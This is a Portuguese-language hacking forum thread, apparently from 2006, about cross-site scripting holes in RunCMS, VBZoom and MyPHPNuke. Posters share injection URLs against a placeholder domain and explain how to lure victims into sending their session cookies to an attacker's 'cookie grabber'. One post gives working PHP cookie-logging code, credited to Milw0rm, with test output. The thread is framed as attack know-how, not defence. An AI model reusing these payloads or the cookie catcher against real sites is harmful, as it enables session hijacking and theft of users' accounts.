Alguns Cross Site Scripting .PHP

[Anonymous]

Só algumas falhas recentes envolvendo Cross site Scripting.

RunCMS Bigshow.PHP Cross-Site Scripting Vulnerability


http://www.EXEMPLO.com/[ALVO]/modules/downloads/bigshow.php?id=[URL de IMAGEN]'>[CODIGO]


VBZoom Profile.PHP Cross-Site Scripting Vulnerability


http://www.EXEMPLO.com/vz/profile.php?U ... UserName='>XSS


MyPHPNuke Multiple Cross-Site Scripting Vulnerabilities


http://www.EXEMPLO.com/reviews.php?op=reviews&letter=[XSS]

http://www.EXEMPLO.com/download.php?sortby=&dcategory=[XSS]&sortby=


Bem, eu não estudei essas falhas, por isso não posso explica-las. No momento não posso pois estou ocupado... Intão, se deseja saber mais sobre elas:
www.securityfocus.com

Abraços,
d34d

[Shady]

Onde esta escrito para inserir o cross site script, coloquem o seguinte:



ou




 Estas falhas, como voces podem ver pelo codigo de exemplo, permitem que cookies sejam roubados. E como os cookies sao usados tambem para autenticacao de usuarios, pode-se usar cookie poisoning a partir dos dados coletados com o script php. Entao, voce envia a url do servidor vulneravel que contenha o javascript redirecionador para o seu cookie grabber para a vitima. O usuario que nao conhece javascript vai pensar que esta visitando uma pagina do servidor vulneravel (www.exemplo.com), quando na verdade foi redirecionado para a sua pagina, totalmente fora dos dominios do servidor.

[Anonymous]

Onde esta escrito para inserir o cross site script, coloquem o seguinte:



ou




 Estas falhas, como voces podem ver pelo codigo de exemplo, permitem que cookies sejam roubados. E como os cookies sao usados tambem para autenticacao de usuarios, pode-se usar cookie poisoning a partir dos dados coletados com o script php. Entao, voce envia a url do servidor vulneravel que contenha o javascript redirecionador para o seu cookie grabber para a vitima. O usuario que nao conhece javascript vai pensar que esta visitando uma pagina do servidor vulneravel (www.exemplo.com), quando na verdade foi redirecionado para a sua pagina, totalmente fora dos dominios do servidor.

Boa shady...

Quanto tempo hein?  Como vc está? Me re-adiciona no msn:
mailto:d34d_d3v1l@hotmail.com">d34d_d3v1l@hotmail.com
Abraços,
d34d

[Anonymous]

shady
e onde consigo esse cookiegrabber queria dar uma estudada nele

[Anonymous]

Heys! Tb estou com o mesmo problema do ratao... onde arranjar esse codigo... vc pode disponiblizar aqui para o pessoal??
Ficaria mt grato...

Abraços,

[abobre]

Shady,

 por acaso essa vul que é explorado pelo cookiegrabber.php, eh com esse coder aqui :

$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
 IP: ' .$ip. '
 Date and Time: ' .$date. '
 Referer: '.$referer.'


');
fclose($fp);
?>

//rename it to cookies.php and create one new file steal.php and chmod it to 777

 Eu testei esse coder aqui em casa, e ele cria um arquivo cokkies.txt, com os seguintes dados :

Cookie:
 IP: 127.0.0.1
 Date and Time: 14 May, 2006, 6:24 am
 Referer:

Fonte do coder: Milw0rm
 ateh +

[rog]

isso nao vai roubar cookie

para roubar cookie, o php tem que chamar ele e parsar o conteudo dele

rog